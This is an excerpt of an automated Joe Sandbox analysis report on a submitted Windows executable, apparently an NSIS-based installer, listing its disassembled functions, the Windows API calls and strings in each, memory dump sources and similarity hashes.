String ID: C:\Users\user\AppData\Local\Temp\nss456A.tmp$C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll$Call
API String ID: 1941528284-819274238
Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
wsprintfW.USER32 ref: 004067A4
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Strings

%s%S.dll, xrefs: 0040679E
UXTHEME, xrefs: 0040675B
\, xrefs: 0040677A

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

Function 00405F0D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405F2B
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\b5BQbAhwVD.exe",004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004036EF), ref: 00405F46

Strings

"C:\Users\user\Desktop\b5BQbAhwVD.exe", xrefs: 00405F0D
nsa, xrefs: 00405F1A
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F12, 00405F16

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\b5BQbAhwVD.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-4195642894
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

Function 72ED1777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 72ED1B5F: GlobalFree.KERNEL32(?), ref: 72ED1DB2
Part of subcall function 72ED1B5F: GlobalFree.KERNEL32(?), ref: 72ED1DB7
Part of subcall function 72ED1B5F: GlobalFree.KERNEL32(?), ref: 72ED1DBC

GlobalFree.KERNEL32(00000000), ref: 72ED1825
FreeLibrary.KERNEL32(?), ref: 72ED18AB
GlobalFree.KERNEL32(00000000), ref: 72ED18D0

Part of subcall function 72ED2352: GlobalAlloc.KERNEL32(00000040,?), ref: 72ED2383

Part of subcall function 72ED2724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,72ED17F6,00000000), ref: 72ED27F4

Part of subcall function 72ED15C6: wsprintfW.USER32 ref: 72ED15F4

Strings

, xrefs: 72ED18B1

Memory Dump Source

Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true

Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: d9fe8ec263ec1a72d23dab9a3e1001713afcbb85ed373307bf320e5928c9d8ae
Instruction ID: 9839b8f5ac4e54819e32cd94d85df1e593f34936f48a5d6b80375beafa0162ea
Opcode Fuzzy Hash: d9fe8ec263ec1a72d23dab9a3e1001713afcbb85ed373307bf320e5928c9d8ae
Instruction Fuzzy Hash: 0441DF7A5402059BDB11DF7CE984B8E3BACBF05319F54E469F90B9E186DBB88087C760

Function 00402032 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB

Strings

n, xrefs: 004020B0

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID: n
API String ID: 334405425-3033804873
Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nss456A.tmp,00000023,00000011,00000002), ref: 0040242F
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nss456A.tmp,00000000,00000011,00000002), ref: 0040246F
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nss456A.tmp,00000000,00000011,00000002), ref: 00402557

Strings

C:\Users\user\AppData\Local\Temp\nss456A.tmp, xrefs: 00402420, 0040242E, 00402445, 00402459, 00402464

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nss456A.tmp
API String ID: 2655323295-3623931551
Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

Function 00401B77 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalFree.KERNEL32(006E0AE8), ref: 00401BE7
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9

Strings

Call, xrefs: 00401B9E, 00401BA4, 00401BBE
n, xrefs: 00401B7A, 00401BAA, 00401BB9, 00401BE2, 00401C0D, 00401C14

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call$n
API String ID: 3394109436-4169552419
Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
GetLastError.KERNEL32 ref: 00405976
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
GetLastError.KERNEL32 ref: 00405995

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053F3
CallWindowProcW.USER32(?,?,?,?), ref: 00405444

Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Strings

, xrefs: 004053D4

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E

Function 004062B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307

Strings

Call, xrefs: 004062BD

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4

Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45

Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45

Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45

Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
